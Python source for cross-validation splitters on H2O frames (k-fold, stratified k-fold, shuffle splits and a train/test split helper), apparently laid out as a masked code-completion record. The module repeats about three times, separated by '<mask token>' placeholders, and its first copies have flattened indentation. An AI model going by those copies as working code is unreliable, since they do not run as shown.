n_train, n_test = _validate_shuffle_split(n_samples, self.test_size,
self.train_size)
y = _val_y(y)
target = np.asarray(frame[y].as_data_frame(use_pandas=True)[y].tolist()
)
classes, y_indices = np.unique(target, return_inverse=True)
n_classes = classes.shape[0]
class_counts = bincount(y_indices)
if np.min(class_counts) < 2:
raise ValueError(
'The least populated class in y has only 1 member, which is too few. The minimum number of labels for any class cannot be less than 2.'
)
if n_train < n_classes:
raise ValueError(
'The train_size=%d should be greater than or equal to the number of classes=%d'
% (n_train, n_classes))
if n_test < n_classes:
raise ValueError(
'The test_size=%d should be greater than or equal to the number of classes=%d'
% (n_test, n_classes))
rng = check_random_state(self.random_state)
p_i = class_counts / float(n_samples)
n_i = np.round(n_train * p_i).astype(int)
t_i = np.minimum(class_counts - n_i, np.round(n_test * p_i).astype(int)
)
for _ in range(self.n_splits):
train = []
test = []
for i, class_i in enumerate(classes):
permutation = rng.permutation(class_counts[i])
perm_indices_class_i = np.where(target == class_i)[0][
permutation]
train.extend(perm_indices_class_i[:n_i[i]])
test.extend(perm_indices_class_i[n_i[i]:n_i[i] + t_i[i]])
if len(train) + len(test) < n_train + n_test:
missing_indices = np.where(bincount(train + test, minlength
=len(target)) == 0)[0]
missing_indices = rng.permutation(missing_indices)
n_missing_train = n_train - len(train)
n_missing_test = n_test - len(test)
if n_missing_train > 0:
train.extend(missing_indices[:n_missing_train])
if n_missing_test > 0:
test.extend(missing_indices[-n_missing_test:])
train = rng.permutation(train)
test = rng.permutation(test)
yield train, test
def split(self, frame, y):
"""Split the frame with stratification.
Parameters
----------
frame : H2OFrame
The frame to split
y : string
The column to stratify.
"""
return super(H2OStratifiedShuffleSplit, self).split(frame, y)
class _H2OBaseKFold(six.with_metaclass(ABCMeta, H2OBaseCrossValidator)):
"""Base class for KFold and Stratified KFold.
Parameters
----------
n_folds : int
The number of splits
shuffle : bool
Whether to shuffle indices
random_state : int or RandomState
The random state for the split
"""
@abstractmethod
def __init__(self, n_folds, shuffle, random_state):
if not isinstance(n_folds, numbers.Integral):
raise ValueError(
'n_folds must be of Integral type. %s of type %s was passed' %
(n_folds, type(n_folds)))
n_folds = int(n_folds)
if n_folds <= 1:
raise ValueError(
'k-fold cross-validation requires at least one train/test split by setting n_folds=2 or more'
)
if shuffle not in [True, False]:
raise TypeError(
'shuffle must be True or False. Got %s (type=%s)' % (str(
shuffle), type(shuffle)))
self.n_folds = n_folds
self.shuffle = shuffle
self.random_state = random_state
@overrides(H2OBaseCrossValidator)
def split(self, frame, y=None):
"""Split the frame.
Parameters
----------
frame : H2OFrame
The frame to split
y : string, optional (default=None)
The column to stratify.
"""
frame = check_frame(frame, copy=False)
n_obs = frame.shape[0]
if self.n_folds > n_obs:
raise ValueError('Cannot have n_folds greater than n_obs')
for train, test in super(_H2OBaseKFold, self).split(frame, y):
yield train, test
@overrides(H2OBaseCrossValidator)
def get_n_splits(self):
"""Get the number of splits or folds.
Returns
-------
n_folds : int
The number of folds
"""
return self.n_folds
class H2OKFold(_H2OBaseKFold):
"""K-folds cross-validator for an H2OFrame.
Parameters
----------
n_folds : int, optional (default=3)
The number of splits
shuffle : bool, optional (default=False)
Whether to shuffle indices
random_state : int or RandomState, optional (default=None)
The random state for the split
"""
def __init__(self, n_folds=3, shuffle=False, random_state=None):
super(H2OKFold, self).__init__(n_folds, shuffle, random_state)
@overrides(_H2OBaseKFold)
def _iter_test_indices(self, frame, y=None):
n_obs = frame.shape[0]
indices = np.arange(n_obs)
if self.shuffle:
check_random_state(self.random_state).shuffle(indices)
n_folds = self.n_folds
fold_sizes = n_obs // n_folds * np.ones(n_folds, dtype=np.int)
fold_sizes[:n_obs % n_folds] += 1
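        # e.g. n_obs=10, n_folds=3 gives fold sizes [4, 3, 3]: each fold gets
        # n_obs // n_folds rows, and the first n_obs % n_folds folds get one extra.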
current = 0
for fold_size in fold_sizes:
start, stop = current, current + fold_size
yield indices[start:stop]
current = stop
class H2OStratifiedKFold(_H2OBaseKFold):
"""K-folds cross-validator for an H2OFrame with
stratified splits.
Parameters
----------
n_folds : int, optional (default=3)
The number of splits
shuffle : bool, optional (default=False)
Whether to shuffle indices
random_state : int or RandomState, optional (default=None)
The random state for the split
"""
def __init__(self, n_folds=3, shuffle=False, random_state=None):
super(H2OStratifiedKFold, self).__init__(n_folds, shuffle, random_state
)
def split(self, frame, y):
"""Split the frame with stratification.
Parameters
----------
frame : H2OFrame
The frame to split
y : string
The column to stratify.
"""
return super(H2OStratifiedKFold, self).split(frame, y)
def _iter_test_masks(self, frame, y):
test_folds = self._make_test_folds(frame, y)
for i in range(self.n_folds):
yield test_folds == i
def _make_test_folds(self, frame, y):
if self.shuffle:
rng = check_random_state(self.random_state)
else:
rng = self.random_state
y = _val_y(y)
if y is None:
raise ValueError(
'H2OStratifiedKFold requires a target name (got None)')
target = frame[y].as_data_frame(use_pandas=True)[y].values
n_samples = target.shape[0]
unique_y, y_inversed = np.unique(target, return_inverse=True)
y_counts = bincount(y_inversed)
min_labels = np.min(y_counts)
if np.all(self.n_folds > y_counts):
raise ValueError(
'All the n_labels for individual classes are less than %d folds.'
% self.n_folds, Warning)
if self.n_folds > min_labels:
warnings.warn(
'The least populated class in y has only %d members, which is too few. The minimum number of labels for any class cannot be less than n_folds=%d.'
% (min_labels, self.n_folds), Warning)
if SK18:
per_cls_cvs = [KFold(self.n_folds, shuffle=self.shuffle,
random_state=rng).split(np.zeros(max(count, self.n_folds))) for
count in y_counts]
else:
per_cls_cvs = [KFold(max(count, self.n_folds), self.n_folds,
shuffle=self.shuffle, random_state=rng) for count in y_counts]
test_folds = np.zeros(n_samples, dtype=np.int)
for test_fold_indices, per_cls_splits in enumerate(zip(*per_cls_cvs)):
for cls, (_, test_split) in zip(unique_y, per_cls_splits):
cls_test_folds = test_folds[target == cls]
test_split = test_split[test_split < len(cls_test_folds)]
cls_test_folds[test_split] = test_fold_indices
test_folds[target == cls] = cls_test_folds
return test_folds
| <mask token>
def _build_repr(self):
cls = self.__class__
init = getattr(cls.__init__, 'deprecated_original', cls.__init__)
init_signature = signature(init)
if init is object.__init__:
args = []
else:
args = sorted([p.name for p in init_signature.parameters.values() if
p.name != 'self' and p.kind != p.VAR_KEYWORD])
class_name = self.__class__.__name__
params = dict()
for key in args:
warnings.simplefilter('always', DeprecationWarning)
try:
with warnings.catch_warnings(record=True) as w:
value = getattr(self, key, None)
if len(w) and w[0].category == DeprecationWarning:
continue
finally:
warnings.filters.pop(0)
params[key] = value
return '%s(%s)' % (class_name, _pprint(params, offset=len(class_name)))
def check_cv(cv=3):
"""Checks the ``cv`` parameter to determine
whether it's a valid int or H2OBaseCrossValidator.
Parameters
----------
cv : int or H2OBaseCrossValidator, optional (default=3)
The number of folds or the H2OBaseCrossValidator
instance.
Returns
-------
cv : H2OBaseCrossValidator
The instance of H2OBaseCrossValidator
"""
if cv is None:
cv = 3
if isinstance(cv, numbers.Integral):
return H2OKFold(cv)
if not isinstance(cv, H2OBaseCrossValidator):
raise ValueError(
'expected int or instance of H2OBaseCrossValidator but got %s' %
type(cv))
return cv
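# For example: check_cv(5) returns H2OKFold(n_folds=5), check_cv(None) defaults
# to H2OKFold(n_folds=3), and an H2OBaseCrossValidator instance passes through
# unchanged.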
def h2o_train_test_split(frame, test_size=None, train_size=None,
random_state=None, stratify=None):
"""Splits an H2OFrame into random train and test subsets
Parameters
----------
frame : H2OFrame
The h2o frame to split
test_size : float, int, or None (default=None)
If float, should be between 0.0 and 1.0 and represent the
proportion of the dataset to include in the test split. If
int, represents the absolute number of test samples. If None,
the value is automatically set to the complement of the train size.
If train size is also None, test size is set to 0.25
train_size : float, int, or None (default=None)
If float, should be between 0.0 and 1.0 and represent the
proportion of the dataset to include in the train split. If
int, represents the absolute number of train samples. If None,
the value is automatically set to the complement of the test size.
random_state : int or RandomState
Pseudo-random number generator state used for random sampling.
stratify : str or None (default=None)
The name of the target on which to stratify the sampling
Returns
-------
out : tuple, shape=(2,)
training_frame : H2OFrame
The training fold split
testing_frame : H2OFrame
The testing fold split
"""
frame = check_frame(frame, copy=False)
if test_size is None and train_size is None:
test_size = 0.25
if stratify is not None:
CVClass = H2OStratifiedShuffleSplit
else:
CVClass = H2OShuffleSplit
cv = CVClass(n_splits=2, test_size=test_size, train_size=train_size,
random_state=random_state)
tr_te_tuples = [(tr, te) for tr, te in cv.split(frame, stratify)][0]
train, test = sorted(list(tr_te_tuples[0])), sorted(list(tr_te_tuples[1]))
out = frame[train, :], frame[test, :]
return out
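# A minimal usage sketch (assumes a running h2o cluster and an H2OFrame ``fr``
# with a categorical column named 'target'; both names are hypothetical):
#
#   train, test = h2o_train_test_split(fr, test_size=0.3, random_state=42,
#                                      stratify='target')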
<mask token>
def _val_y(y):
if isinstance(y, six.string_types):
return str(y)
elif y is None:
return y
raise TypeError('y must be a string. Got %s' % y)
class H2OBaseCrossValidator(six.with_metaclass(ABCMeta)):
"""Base class for H2O cross validation operations.
All implementing subclasses should override ``get_n_splits``
and ``_iter_test_indices``.
"""
def __init__(self):
pass
def split(self, frame, y=None):
"""Generate indices to split data into training and test.
Parameters
----------
frame : ``H2OFrame``
The h2o frame to split
y : str, optional (default=None)
The name of the column to stratify, if applicable.
Returns
-------
train : ndarray
The training set indices for the split
test : ndarray
The testing set indices for that split
"""
frame = check_frame(frame, copy=False)
indices = np.arange(frame.shape[0])
for test_index in self._iter_test_masks(frame, y):
train_index = indices[np.logical_not(test_index)]
test_index = indices[test_index]
yield list(train_index), list(test_index)
def _iter_test_masks(self, frame, y=None):
"""Generates boolean masks corresponding to the tests set.
Parameters
----------
frame : H2OFrame
The h2o frame to split
y : string, optional (default=None)
The column to stratify.
Returns
-------
test_mask : np.ndarray, shape=(n_samples,)
The indices for the test split
"""
for test_index in self._iter_test_indices(frame, y):
test_mask = np.zeros(frame.shape[0], dtype=np.bool)
test_mask[test_index] = True
yield test_mask
def _iter_test_indices(self, frame, y=None):
raise NotImplementedError(
'this method must be implemented by a subclass')
@abstractmethod
def get_n_splits(self):
"""Get the number of splits or folds for
this instance of the cross validator.
"""
pass
def __repr__(self):
return _build_repr(self)
def _validate_shuffle_split_init(test_size, train_size):
"""Validation helper to check the test_size and train_size at init"""
if test_size is None and train_size is None:
raise ValueError('test_size and train_size can not both be None')
if test_size is not None:
if np.asarray(test_size).dtype.kind == 'f':
if test_size >= 1.0:
raise ValueError(
'test_size=%f should be smaller than 1.0 or be an integer'
% test_size)
elif np.asarray(test_size).dtype.kind != 'i':
raise ValueError('Invalid value for test_size: %r' % test_size)
if train_size is not None:
if np.asarray(train_size).dtype.kind == 'f':
if train_size >= 1.0:
raise ValueError(
'train_size=%f should be smaller than 1.0 or be an integer'
                    % train_size)
elif np.asarray(test_size
).dtype.kind == 'f' and train_size + test_size > 1.0:
raise ValueError(
'The sum of test_size and train_size = %fshould be smaller than 1.0. Reduce test_size and/or train_size.'
% (train_size + test_size))
elif np.asarray(train_size).dtype.kind != 'i':
raise ValueError('Invalid value for train_size: %r' % train_size)
def _validate_shuffle_split(n_samples, test_size, train_size):
if test_size is not None and np.asarray(test_size
).dtype.kind == 'i' and test_size >= n_samples:
raise ValueError(
'test_size=%d should be smaller than the number of samples %d' %
(test_size, n_samples))
if train_size is not None and np.asarray(train_size
).dtype.kind == 'i' and train_size >= n_samples:
raise ValueError(
'train_size=%d should be smaller than the number of samples %d' %
(train_size, n_samples))
if np.asarray(test_size).dtype.kind == 'f':
n_test = ceil(test_size * n_samples)
elif np.asarray(test_size).dtype.kind == 'i':
n_test = float(test_size)
if train_size is None:
n_train = n_samples - n_test
elif np.asarray(train_size).dtype.kind == 'f':
n_train = floor(train_size * n_samples)
else:
n_train = float(train_size)
if test_size is None:
n_test = n_samples - n_train
if n_train + n_test > n_samples:
raise ValueError(
'The sum of train_size and test_size=%d, should be smaller than the number of samples %d. Reduce test_size and/or train_size.'
% (n_train + n_test, n_samples))
return int(n_train), int(n_test)
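# For example: _validate_shuffle_split(100, test_size=0.25, train_size=None)
# returns (75, 25), since n_test = ceil(0.25 * 100) = 25 and
# n_train = 100 - 25 = 75.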
class H2OBaseShuffleSplit(six.with_metaclass(ABCMeta)):
"""Base class for H2OShuffleSplit and H2OStratifiedShuffleSplit. This
is used for ``h2o_train_test_split`` in strategic train/test splits of
H2OFrames. Implementing subclasses should override ``_iter_indices``.
Parameters
----------
n_splits : int, optional (default=2)
The number of folds or splits in the split
test_size : float or int, optional (default=0.1)
The ratio of observations for the test fold
train_size : float or int, optional (default=None)
The ratio of observations for the train fold
random_state : int or RandomState, optional (default=None)
The random state for duplicative purposes.
"""
def __init__(self, n_splits=2, test_size=0.1, train_size=None,
random_state=None):
_validate_shuffle_split_init(test_size, train_size)
self.n_splits = n_splits
self.test_size = test_size
self.train_size = train_size
self.random_state = random_state
def split(self, frame, y=None):
"""Split the frame.
Parameters
----------
frame : H2OFrame
The frame to split
y : string, optional (default=None)
The column to stratify.
"""
for train, test in self._iter_indices(frame, y):
yield train, test
@abstractmethod
def _iter_indices(self, frame, y):
"""Abstract method for iterating the indices.
Parameters
----------
frame : H2OFrame
The frame to split
y : string, optional (default=None)
The column to stratify.
"""
pass
def get_n_splits(self):
"""Get the number of splits or folds for
this instance of the shuffle split.
"""
return self.n_splits
def __repr__(self):
return _build_repr(self)
class H2OShuffleSplit(H2OBaseShuffleSplit):
"""Default shuffle splitter used for ``h2o_train_test_split``.
This shuffle split class will not perform any stratification, and
will simply shuffle indices and split into the number of specified
sub-frames.
"""
def _iter_indices(self, frame, y=None):
"""Iterate the indices.
Parameters
----------
frame : H2OFrame
The frame to split
y : string, optional (default=None)
The column to stratify. Since this class does
not perform stratification, ``y`` is unused.
Returns
-------
ind_train : np.ndarray, shape=(n_samples,)
The train indices
ind_test : np.ndarray, shape=(n_samples,)
The test indices
"""
n_samples = frame.shape[0]
n_train, n_test = _validate_shuffle_split(n_samples, self.test_size,
self.train_size)
rng = check_random_state(self.random_state)
for i in range(self.n_splits):
permutation = rng.permutation(n_samples)
ind_test = permutation[:n_test]
ind_train = permutation[n_test:n_test + n_train]
yield ind_train, ind_test
class H2OStratifiedShuffleSplit(H2OBaseShuffleSplit):
"""Shuffle splitter used for ``h2o_train_test_split`` when stratified
option is specified. This shuffle split class will perform stratification.
"""
def _iter_indices(self, frame, y):
"""Iterate the indices with stratification.
Parameters
----------
frame : H2OFrame
The frame to split
y : string
The column to stratify.
Returns
-------
train : np.ndarray, shape=(n_samples,)
The train indices
test : np.ndarray, shape=(n_samples,)
The test indices
"""
n_samples = frame.shape[0]
n_train, n_test = _validate_shuffle_split(n_samples, self.test_size,
self.train_size)
y = _val_y(y)
target = np.asarray(frame[y].as_data_frame(use_pandas=True)[y].tolist()
)
classes, y_indices = np.unique(target, return_inverse=True)
n_classes = classes.shape[0]
class_counts = bincount(y_indices)
if np.min(class_counts) < 2:
raise ValueError(
'The least populated class in y has only 1 member, which is too few. The minimum number of labels for any class cannot be less than 2.'
)
if n_train < n_classes:
raise ValueError(
'The train_size=%d should be greater than or equal to the number of classes=%d'
% (n_train, n_classes))
if n_test < n_classes:
raise ValueError(
'The test_size=%d should be greater than or equal to the number of classes=%d'
% (n_test, n_classes))
rng = check_random_state(self.random_state)
p_i = class_counts / float(n_samples)
n_i = np.round(n_train * p_i).astype(int)
t_i = np.minimum(class_counts - n_i, np.round(n_test * p_i).astype(int)
)
for _ in range(self.n_splits):
train = []
test = []
for i, class_i in enumerate(classes):
permutation = rng.permutation(class_counts[i])
perm_indices_class_i = np.where(target == class_i)[0][
permutation]
train.extend(perm_indices_class_i[:n_i[i]])
test.extend(perm_indices_class_i[n_i[i]:n_i[i] + t_i[i]])
if len(train) + len(test) < n_train + n_test:
missing_indices = np.where(bincount(train + test, minlength
=len(target)) == 0)[0]
missing_indices = rng.permutation(missing_indices)
n_missing_train = n_train - len(train)
n_missing_test = n_test - len(test)
if n_missing_train > 0:
train.extend(missing_indices[:n_missing_train])
if n_missing_test > 0:
test.extend(missing_indices[-n_missing_test:])
train = rng.permutation(train)
test = rng.permutation(test)
yield train, test
def split(self, frame, y):
"""Split the frame with stratification.
Parameters
----------
frame : H2OFrame
The frame to split
y : string
The column to stratify.
"""
return super(H2OStratifiedShuffleSplit, self).split(frame, y)
class _H2OBaseKFold(six.with_metaclass(ABCMeta, H2OBaseCrossValidator)):
"""Base class for KFold and Stratified KFold.
Parameters
----------
n_folds : int
The number of splits
shuffle : bool
Whether to shuffle indices
random_state : int or RandomState
The random state for the split
"""
@abstractmethod
def __init__(self, n_folds, shuffle, random_state):
if not isinstance(n_folds, numbers.Integral):
raise ValueError(
'n_folds must be of Integral type. %s of type %s was passed' %
(n_folds, type(n_folds)))
n_folds = int(n_folds)
if n_folds <= 1:
raise ValueError(
'k-fold cross-validation requires at least one train/test split by setting n_folds=2 or more'
)
if shuffle not in [True, False]:
raise TypeError(
'shuffle must be True or False. Got %s (type=%s)' % (str(
shuffle), type(shuffle)))
self.n_folds = n_folds
self.shuffle = shuffle
self.random_state = random_state
@overrides(H2OBaseCrossValidator)
def split(self, frame, y=None):
"""Split the frame.
Parameters
----------
frame : H2OFrame
The frame to split
y : string, optional (default=None)
The column to stratify.
"""
frame = check_frame(frame, copy=False)
n_obs = frame.shape[0]
if self.n_folds > n_obs:
raise ValueError('Cannot have n_folds greater than n_obs')
for train, test in super(_H2OBaseKFold, self).split(frame, y):
yield train, test
@overrides(H2OBaseCrossValidator)
def get_n_splits(self):
"""Get the number of splits or folds.
Returns
-------
n_folds : int
The number of folds
"""
return self.n_folds
class H2OKFold(_H2OBaseKFold):
"""K-folds cross-validator for an H2OFrame.
Parameters
----------
n_folds : int, optional (default=3)
The number of splits
shuffle : bool, optional (default=False)
Whether to shuffle indices
random_state : int or RandomState, optional (default=None)
The random state for the split
"""
def __init__(self, n_folds=3, shuffle=False, random_state=None):
super(H2OKFold, self).__init__(n_folds, shuffle, random_state)
@overrides(_H2OBaseKFold)
def _iter_test_indices(self, frame, y=None):
n_obs = frame.shape[0]
indices = np.arange(n_obs)
if self.shuffle:
check_random_state(self.random_state).shuffle(indices)
n_folds = self.n_folds
fold_sizes = n_obs // n_folds * np.ones(n_folds, dtype=np.int)
fold_sizes[:n_obs % n_folds] += 1
current = 0
for fold_size in fold_sizes:
start, stop = current, current + fold_size
yield indices[start:stop]
current = stop
class H2OStratifiedKFold(_H2OBaseKFold):
"""K-folds cross-validator for an H2OFrame with
stratified splits.
Parameters
----------
n_folds : int, optional (default=3)
The number of splits
shuffle : bool, optional (default=False)
Whether to shuffle indices
random_state : int or RandomState, optional (default=None)
The random state for the split
"""
def __init__(self, n_folds=3, shuffle=False, random_state=None):
super(H2OStratifiedKFold, self).__init__(n_folds, shuffle, random_state
)
def split(self, frame, y):
"""Split the frame with stratification.
Parameters
----------
frame : H2OFrame
The frame to split
y : string
The column to stratify.
"""
return super(H2OStratifiedKFold, self).split(frame, y)
def _iter_test_masks(self, frame, y):
test_folds = self._make_test_folds(frame, y)
for i in range(self.n_folds):
yield test_folds == i
def _make_test_folds(self, frame, y):
if self.shuffle:
rng = check_random_state(self.random_state)
else:
rng = self.random_state
y = _val_y(y)
if y is None:
raise ValueError(
'H2OStratifiedKFold requires a target name (got None)')
target = frame[y].as_data_frame(use_pandas=True)[y].values
n_samples = target.shape[0]
unique_y, y_inversed = np.unique(target, return_inverse=True)
y_counts = bincount(y_inversed)
min_labels = np.min(y_counts)
if np.all(self.n_folds > y_counts):
raise ValueError(
'All the n_labels for individual classes are less than %d folds.'
                % self.n_folds)
if self.n_folds > min_labels:
warnings.warn(
'The least populated class in y has only %d members, which is too few. The minimum number of labels for any class cannot be less than n_folds=%d.'
% (min_labels, self.n_folds), Warning)
if SK18:
per_cls_cvs = [KFold(self.n_folds, shuffle=self.shuffle,
random_state=rng).split(np.zeros(max(count, self.n_folds))) for
count in y_counts]
else:
per_cls_cvs = [KFold(max(count, self.n_folds), self.n_folds,
shuffle=self.shuffle, random_state=rng) for count in y_counts]
test_folds = np.zeros(n_samples, dtype=np.int)
for test_fold_indices, per_cls_splits in enumerate(zip(*per_cls_cvs)):
for cls, (_, test_split) in zip(unique_y, per_cls_splits):
cls_test_folds = test_folds[target == cls]
test_split = test_split[test_split < len(cls_test_folds)]
cls_test_folds[test_split] = test_fold_indices
test_folds[target == cls] = cls_test_folds
return test_folds
| from __future__ import division, print_function, absolute_import
import numbers
import warnings
from abc import ABCMeta, abstractmethod
import numpy as np
from .base import check_frame
from skutil.base import overrides
from sklearn.externals import six
from sklearn.base import _pprint
from sklearn.utils.fixes import signature, bincount
from sklearn.utils import check_random_state
from math import ceil, floor
try:
from h2o import H2OEstimator
except ImportError:
from h2o.estimators.estimator_base import H2OEstimator
try:
from sklearn.model_selection import KFold
SK18 = True
except ImportError:
from sklearn.cross_validation import KFold
SK18 = False
__all__ = [
'check_cv',
'h2o_train_test_split',
'H2OKFold',
'H2OShuffleSplit',
'H2OStratifiedKFold',
'H2OStratifiedShuffleSplit'
]
def _build_repr(self):
# XXX This is copied from sklearn.BaseEstimator's get_params
cls = self.__class__
init = getattr(cls.__init__, 'deprecated_original', cls.__init__)
init_signature = signature(init)
if init is object.__init__:
args = []
else:
args = sorted([p.name for p in init_signature.parameters.values()
if p.name != 'self' and p.kind != p.VAR_KEYWORD])
class_name = self.__class__.__name__
params = dict()
for key in args:
warnings.simplefilter("always", DeprecationWarning)
try:
with warnings.catch_warnings(record=True) as w:
value = getattr(self, key, None)
if len(w) and w[0].category == DeprecationWarning:
continue
finally:
warnings.filters.pop(0)
params[key] = value
return '%s(%s)' % (class_name, _pprint(params, offset=len(class_name)))
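# A small illustrative check (not from the original source): the repr built
# above lists the constructor arguments alphabetically, e.g.
# repr(H2OKFold()) -> "H2OKFold(n_folds=3, random_state=None, shuffle=False)".
def _repr_demo():
    return repr(H2OKFold())  # H2OKFold is defined later in this module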
def check_cv(cv=3):
"""Checks the ``cv`` parameter to determine
whether it's a valid int or H2OBaseCrossValidator.
Parameters
----------
cv : int or H2OBaseCrossValidator, optional (default=3)
The number of folds or the H2OBaseCrossValidator
instance.
Returns
-------
cv : H2OBaseCrossValidator
The instance of H2OBaseCrossValidator
"""
if cv is None:
cv = 3
if isinstance(cv, numbers.Integral):
return H2OKFold(cv)
if not isinstance(cv, H2OBaseCrossValidator):
raise ValueError('expected int or instance of '
'H2OBaseCrossValidator but got %s'
% type(cv))
return cv
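# A minimal sketch (illustrative, not part of the original module) of the
# normalization contract above: ints become H2OKFold instances, and existing
# cross-validators pass through unchanged.
def _check_cv_demo():
    assert isinstance(check_cv(None), H2OKFold)   # default is 3-fold
    assert check_cv(5).get_n_splits() == 5        # int -> H2OKFold(5)
    kf = H2OStratifiedKFold(n_folds=4)
    assert check_cv(kf) is kf                     # pass-through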
def h2o_train_test_split(frame, test_size=None, train_size=None, random_state=None, stratify=None):
"""Splits an H2OFrame into random train and test subsets
Parameters
----------
frame : H2OFrame
The h2o frame to split
test_size : float, int, or None (default=None)
If float, should be between 0.0 and 1.0 and represent the
proportion of the dataset to include in the test split. If
int, represents the absolute number of test samples. If None,
the value is automatically set to the complement of the train size.
If train size is also None, test size is set to 0.25
train_size : float, int, or None (default=None)
If float, should be between 0.0 and 1.0 and represent the
proportion of the dataset to include in the train split. If
int, represents the absolute number of train samples. If None,
the value is automatically set to the complement of the test size.
random_state : int or RandomState
Pseudo-random number generator state used for random sampling.
stratify : str or None (default=None)
The name of the target on which to stratify the sampling
Returns
-------
out : tuple, shape=(2,)
training_frame : H2OFrame
The training fold split
testing_frame : H2OFrame
The testing fold split
"""
frame = check_frame(frame, copy=False)
if test_size is None and train_size is None:
test_size = 0.25
if stratify is not None:
CVClass = H2OStratifiedShuffleSplit
else:
CVClass = H2OShuffleSplit
cv = CVClass(n_splits=2,
test_size=test_size,
train_size=train_size,
random_state=random_state)
# for the h2o one, we only need iter 0
tr_te_tuples = [(tr, te) for tr, te in cv.split(frame, stratify)][0]
# h2o "doesn't reorder rows" so we need to keep these sorted...
train, test = sorted(list(tr_te_tuples[0])), sorted(list(tr_te_tuples[1]))
out = (
frame[train, :],
frame[test, :]
)
return out
# Avoid a pb with nosetests...
h2o_train_test_split.__test__ = False
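# A hedged usage sketch for h2o_train_test_split. The live cluster, the file
# name 'my_data.csv', and the categorical 'label' column are assumptions for
# illustration only; none come from the original source.
def _train_test_split_demo():
    import h2o
    h2o.init()
    fr = h2o.import_file('my_data.csv')  # hypothetical input file
    train, test = h2o_train_test_split(
        fr, test_size=0.2, random_state=42, stratify='label')
    print(train.shape, test.shape)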
def _val_y(y):
if isinstance(y, six.string_types):
return str(y)
elif y is None:
return y
raise TypeError('y must be a string. Got %s' % y)
class H2OBaseCrossValidator(six.with_metaclass(ABCMeta)):
"""Base class for H2O cross validation operations.
All implementing subclasses should override ``get_n_splits``
and ``_iter_test_indices``.
"""
def __init__(self):
pass
def split(self, frame, y=None):
"""Generate indices to split data into training and test.
Parameters
----------
frame : ``H2OFrame``
The h2o frame to split
y : str, optional (default=None)
The name of the column to stratify, if applicable.
Returns
-------
train : ndarray
The training set indices for the split
test : ndarray
The testing set indices for that split
"""
frame = check_frame(frame, copy=False)
indices = np.arange(frame.shape[0])
for test_index in self._iter_test_masks(frame, y):
train_index = indices[np.logical_not(test_index)]
test_index = indices[test_index]
# h2o can't handle anything but lists...
yield list(train_index), list(test_index)
def _iter_test_masks(self, frame, y=None):
"""Generates boolean masks corresponding to the tests set.
Parameters
----------
frame : H2OFrame
The h2o frame to split
y : string, optional (default=None)
The column to stratify.
Returns
-------
test_mask : np.ndarray, shape=(n_samples,)
            The boolean mask for the test split
"""
for test_index in self._iter_test_indices(frame, y):
test_mask = np.zeros(frame.shape[0], dtype=np.bool)
test_mask[test_index] = True
yield test_mask
def _iter_test_indices(self, frame, y=None):
raise NotImplementedError('this method must be implemented by a subclass')
@abstractmethod
def get_n_splits(self):
"""Get the number of splits or folds for
this instance of the cross validator.
"""
pass
def __repr__(self):
return _build_repr(self)
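# A minimal subclass sketch (illustrative only) of the contract documented
# above: implement _iter_test_indices and get_n_splits, and split() plus
# _iter_test_masks are inherited for free.
class _EveryOtherRowSplit(H2OBaseCrossValidator):
    def _iter_test_indices(self, frame, y=None):
        yield np.arange(frame.shape[0])[::2]  # one split: even rows as test
    def get_n_splits(self):
        return 1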
def _validate_shuffle_split_init(test_size, train_size):
"""Validation helper to check the test_size and train_size at init"""
if test_size is None and train_size is None:
raise ValueError('test_size and train_size can not both be None')
if test_size is not None:
if np.asarray(test_size).dtype.kind == 'f':
if test_size >= 1.:
raise ValueError(
'test_size=%f should be smaller '
'than 1.0 or be an integer' % test_size)
elif np.asarray(test_size).dtype.kind != 'i':
raise ValueError('Invalid value for test_size: %r' % test_size)
if train_size is not None:
if np.asarray(train_size).dtype.kind == 'f':
if train_size >= 1.:
raise ValueError(
'train_size=%f should be smaller '
                    'than 1.0 or be an integer' % train_size)
elif (np.asarray(test_size).dtype.kind == 'f' and
(train_size + test_size) > 1.):
            raise ValueError('The sum of test_size and train_size = %f '
'should be smaller than 1.0. Reduce test_size '
'and/or train_size.' % (train_size + test_size))
elif np.asarray(train_size).dtype.kind != 'i':
raise ValueError('Invalid value for train_size: %r' % train_size)
def _validate_shuffle_split(n_samples, test_size, train_size):
if test_size is not None and np.asarray(test_size).dtype.kind == 'i' and test_size >= n_samples:
raise ValueError('test_size=%d should be smaller '
'than the number of samples %d' % (test_size, n_samples))
if train_size is not None and np.asarray(train_size).dtype.kind == 'i' and train_size >= n_samples:
raise ValueError('train_size=%d should be smaller '
'than the number of samples %d' % (train_size, n_samples))
if np.asarray(test_size).dtype.kind == 'f':
n_test = ceil(test_size * n_samples)
elif np.asarray(test_size).dtype.kind == 'i':
n_test = float(test_size)
if train_size is None:
n_train = n_samples - n_test
elif np.asarray(train_size).dtype.kind == 'f':
n_train = floor(train_size * n_samples)
else:
n_train = float(train_size)
if test_size is None:
n_test = n_samples - n_train
if n_train + n_test > n_samples:
raise ValueError('The sum of train_size and test_size=%d, '
'should be smaller than the number of '
'samples %d. Reduce test_size and/or '
'train_size.' % (n_train + n_test, n_samples))
return int(n_train), int(n_test)
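# Worked example of the arithmetic above (values are illustrative):
# n_samples=100, test_size=0.25 -> n_test = ceil(0.25 * 100) = 25, and with
# train_size=None, n_train = 100 - 25 = 75.
def _validate_shuffle_split_demo():
    assert _validate_shuffle_split(100, 0.25, None) == (75, 25)
    assert _validate_shuffle_split(10, 3, None) == (7, 3)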
class H2OBaseShuffleSplit(six.with_metaclass(ABCMeta)):
"""Base class for H2OShuffleSplit and H2OStratifiedShuffleSplit. This
is used for ``h2o_train_test_split`` in strategic train/test splits of
H2OFrames. Implementing subclasses should override ``_iter_indices``.
Parameters
----------
n_splits : int, optional (default=2)
The number of folds or splits in the split
test_size : float or int, optional (default=0.1)
The ratio of observations for the test fold
train_size : float or int, optional (default=None)
The ratio of observations for the train fold
random_state : int or RandomState, optional (default=None)
        The random state, for reproducibility of splits.
"""
def __init__(self, n_splits=2, test_size=0.1, train_size=None, random_state=None):
_validate_shuffle_split_init(test_size, train_size)
self.n_splits = n_splits
self.test_size = test_size
self.train_size = train_size
self.random_state = random_state
def split(self, frame, y=None):
"""Split the frame.
Parameters
----------
frame : H2OFrame
The frame to split
y : string, optional (default=None)
The column to stratify.
"""
for train, test in self._iter_indices(frame, y):
yield train, test
@abstractmethod
def _iter_indices(self, frame, y):
"""Abstract method for iterating the indices.
Parameters
----------
frame : H2OFrame
The frame to split
y : string, optional (default=None)
The column to stratify.
"""
pass
def get_n_splits(self):
"""Get the number of splits or folds for
this instance of the shuffle split.
"""
return self.n_splits
def __repr__(self):
return _build_repr(self)
class H2OShuffleSplit(H2OBaseShuffleSplit):
